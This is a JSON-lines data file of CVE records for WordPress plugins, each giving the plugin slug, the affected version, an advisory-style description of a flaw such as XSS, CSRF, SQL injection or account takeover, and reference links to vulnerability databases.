{"CVE_ID":"CVE-2024-12027","slug":"cf7-message-filter","versionImpact":"1.6.3","description":"The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the updateFilter() and deleteFilter() functions in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update and delete filters.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-message-filter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5754d2eb-dd31-4056-8a02-8b71b78f774b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12469","slug":"wp-base-booking-of-appointments-services-and-events","versionImpact":"4.9.1","description":"The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018status\u2019 parameter in all versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207855\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207855\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-base-booking-of-appointments-services-and-events\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-base-booking-of-appointments-services-and-events\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6613ad-1fb2-4278-adc1-fe5d1ade3ad5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb6613ad-1fb2-4278-adc1-fe5d1ade3ad5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12439","slug":"marketplace-items","versionImpact":"1.5.5","description":"The Marketplace Items plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'marketplace' shortcode in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/marketplace-items\\\/trunk\\\/marketplace-items.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketplace-items\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602ae805-a6a6-48bd-bd2a-00fafadfdce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602ae805-a6a6-48bd-bd2a-00fafadfdce4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0350","slug":"wow-carousel-for-divi-lite","versionImpact":"2.0.4","description":"The Divi Carousel Maker \u2013 Image, Logo, Testimonial, Post Carousel & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Carousel and Logo Carousel in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L327\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wow-carousel-for-divi-lite\\\/trunk\\\/includes\\\/divi4\\\/modules\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226742\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226742\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-carousel-for-divi-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wow-carousel-for-divi-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e57a85b-3ea8-46df-ab60-ce835268b1f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e57a85b-3ea8-46df-ab60-ce835268b1f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13543","slug":"zarinpal-paid-downloads","versionImpact":"2.3","description":"The Zarinpal Paid Download WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04a545c4-75d3-4672-8530-00bb879991ca\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04a545c4-75d3-4672-8530-00bb879991ca\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1488","slug":"wpo365-msgraphmailer","versionImpact":"3.2","description":"The WPO365 | MICROSOFT 365 GRAPH MAILER plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 3.2. This is due to insufficient validation on the redirect url supplied via the 'redirect_to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if 1. they can successfully trick them into performing an action and 2. the plugin is activated but not configured.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244747\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244747\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpo365-msgraphmailer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpo365-msgraphmailer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a1782c3-ae0b-42f1-aa5e-dabfa2a5bbcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a1782c3-ae0b-42f1-aa5e-dabfa2a5bbcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpo365.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/www.wpo365.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13413","slug":"productdyno","versionImpact":"1.0.24","description":"The ProductDyno plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018res\u2019 parameter in all versions up to, and including, 1.0.24 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This vulnerability is potentially a duplicate of CVE-2025-22320.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/productdyno\\\/trunk\\\/admin\\\/partials\\\/productdyno-admin-display.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/productdyno\\\/trunk\\\/admin\\\/partials\\\/productdyno-admin-display.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251678\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251678\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/productdyno\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/productdyno\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc1289a-abd1-43db-89b7-3e81878a0f9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc1289a-abd1-43db-89b7-3e81878a0f9a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4131","slug":"gmapsmania","versionImpact":"1.1","description":"The GmapsMania plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's gmap shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmapsmania\\\/trunk\\\/gmapsmania.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmapsmania\\\/trunk\\\/gmapsmania.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30d39718-945a-43a2-be08-70be1af55965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30d39718-945a-43a2-be08-70be1af55965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11372","slug":"logs-de-connexion","versionImpact":"3.0.2","description":"The Connexion Logs WordPress plugin through 3.0.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de74199a-001e-4388-82ae-70cfd5a49457\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de74199a-001e-4388-82ae-70cfd5a49457\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7440","slug":"anber-elementor-addon","versionImpact":"1.0.1","description":"The Anber Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the $item['button_link']['url'] parameter in all versions up to, and including, 1.0.1 to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67b0f756-9130-402d-9787-78d482fa183e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67b0f756-9130-402d-9787-78d482fa183e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4795","slug":"wc-gallery","versionImpact":"1.67","description":"The Galleries by Angie Makes WordPress plugin through 1.67 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5052e60f-59ea-4758-8af3-112285a18639\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5052e60f-59ea-4758-8af3-112285a18639\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0424","slug":" ms-reviews","versionImpact":"1.5","description":"The MS-Reviews WordPress plugin through 1.5 does not sanitise and escape reviews, which could allow users any authenticated users, such as Subscribers to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0f8713f-54b2-4ab2-a475-60a1692a50e9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0f8713f-54b2-4ab2-a475-60a1692a50e9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3764","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.90","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.90. This is due to missing or incorrect nonce validation on the Save function. This makes it possible for unauthenticated attackers to make changes to invoices via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf2e701-9f9b-4a78-a61a-0cf90cdd9755?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf2e701-9f9b-4a78-a61a-0cf90cdd9755?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951617\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?old=2949518&old_path=woo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951617\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?old=2949518&old_path=woo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L894\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48322","slug":"edoc-employee-application","versionImpact":"1.13","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in eDoc Intelligence eDoc Employee Job Application \u2013 Best WordPress Job Manager for Employees allows Reflected XSS.This issue affects eDoc Employee Job Application \u2013 Best WordPress Job Manager for Employees: from n\/a through 1.13.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/edoc-employee-application\\\/wordpress-edoc-employee-job-application-plugin-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/edoc-employee-application\\\/wordpress-edoc-employee-job-application-plugin-1-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9895","slug":"clover-online-orders","versionImpact":"1.5.7","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's moo_receipt_link shortcode in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7263e89-94b2-42e6-a7ed-a86579ce649e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7263e89-94b2-42e6-a7ed-a86579ce649e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clover-online-orders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clover-online-orders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/moo_OnlineOrders.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/shortcodes\\\/checkoutPage.php#L2011\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/trunk\\\/includes\\\/shortcodes\\\/checkoutPage.php#L2011\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168433\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168433\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12003","slug":"wp-system","versionImpact":"1.1.1","description":"The WP System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the generate_wp_system_page_content() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-system\\\/trunk\\\/wp-system.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-system\\\/trunk\\\/wp-system.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12127","slug":"sikshya","versionImpact":"0.0.21","description":"The Learning Management System, eLearning, Course Builder, WordPress LMS Plugin \u2013 Sikshya LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 0.0.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207940\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207940\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sikshya\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sikshya\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0170668-65bc-4d65-a88b-9398391c98d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0170668-65bc-4d65-a88b-9398391c98d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12438","slug":"woocommerce-digital-content-delivery-with-drm-flickrocket","versionImpact":"4.74","description":"The WooCommerce Digital Content Delivery (incl. DRM) \u2013 FlickRocket plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'start_date\u2019 and 'end_date' parameters in all versions up to, and including, 4.74 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L613\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L613\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L614\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L629\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L629\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L632\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L632\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L655\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L655\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L658\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-digital-content-delivery-with-drm-flickrocket\\\/trunk\\\/woocommerce-flickrocket.php#L658\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3909f6-fd2f-44e7-83b5-51c8cda4b20f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3909f6-fd2f-44e7-83b5-51c8cda4b20f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13822","slug":"totalcontest-lite","versionImpact":"2.8.1","description":"The Photo Contest  | Competition | Video Contest WordPress plugin through 2.8.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f0f1553-1987-428c-9fe3-ffb3f6b0aecc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1f0f1553-1987-428c-9fe3-ffb3f6b0aecc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3746","slug":"otpless","versionImpact":"2.0.59","description":"The OTP-less one tap Sign in plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 2.0.14 to 2.0.59. This is due to the plugin not properly validating a user's identity prior to updating their details, like email. This makes it possible for unauthenticated attackers to change arbitrary users' email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.\r\nAdditionally, the plugin returns authentication cookies in the response, which can be used to access the account directly.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otpless\\\/tags\\\/2.0.59.\\\/includes\\\/class-login.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otpless\\\/tags\\\/2.0.59.\\\/includes\\\/class-login.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63fab608-1a75-4b07-8d82-8ab87e197547?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63fab608-1a75-4b07-8d82-8ab87e197547?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11269","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin WordPress plugin through 1.6 does not sanitize and escape a parameter before using it in a SQL statement, allowing Admin to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad89687-adb0-4c45-938c-0c18fda7f36f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ad89687-adb0-4c45-938c-0c18fda7f36f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7439","slug":"anber-elementor-addon","versionImpact":"1.0.1","description":"Anber Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the $anber_item['button_link']['url']\u2019 parameter in all versions up to, and including, 1.0.1 to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/anber-elementor-addon\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb46d7fa-9667-4479-8136-837cb61eaf4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb46d7fa-9667-4479-8136-837cb61eaf4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}